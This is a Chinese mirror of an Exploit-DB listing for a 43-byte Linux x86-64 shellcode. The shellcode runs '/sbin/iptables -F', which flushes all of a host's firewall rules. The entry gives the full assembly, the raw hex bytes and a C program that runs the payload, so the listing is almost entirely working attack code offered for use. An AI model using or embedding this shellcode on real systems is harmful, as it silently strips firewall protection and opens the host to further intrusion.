漏洞概要 漏洞标题:Linux/x86-64 – execve("/sbin/iptables", ["/sbin/iptables", "-F"], NULL) Shellcode (43 bytes)提交时间:2018-01-13危害等级:高 相关厂商: 漏洞分类:exp公布 关注度:共 45 人关注 漏洞详情 EDB-ID: 43553 Author: 0x4ndr3 Published: 2018-01-13 CVE: N/A Type: Shellcode Platform: Linux_x86-64 Aliases: N/A Advisory/Source: Link Tags: N/A E-DB Verified: <a href="javascript:void(0);" data-trigger="focus" data-toggle="popover" data-placement="top" data-content='We make an effort to verify exploits () in our labs, when possible. A “non verified” exploit (marked by a clock icon ) simply means we did not have the opportunity to test the exploit internally.’> Shellcode: Download / View Raw Shellcode Size: 43 bytes /* section .text global _start _start: push 0x3b pop rax cdq push rdx push word 0x462d push rsp pop rcx push rdx mov rbx, 0x73656c6261747069 push rbx mov rbx, 0x2f2f2f6e6962732f push rbx push rsp pop rdi push rdx push rcx push rdi push rsp pop rsi ; execve("/sbin/iptables", ["/sbin/iptables", "-F"], NULL); syscall */ #include<stdio.h> #include<string.h> unsigned char code[] = \ "\x6a\x3b\x58\x99\x52\x66\x68\x2d\x46\x54\x59\x52\x48\xbb\x69\x70\x74\x61\x62\x6c\x65\x73\x53\x48\xbb\x2f\x73\x62\x69\x6e\x2f\x2f\x2f\x53\x54\x5f\x52\x51\x57\x54\x5e\x0f\x05"; void main() { printf("Shellcode Length: %lu\n", strlen(code)); int (*ret)() = (int(*)())code; ret(); }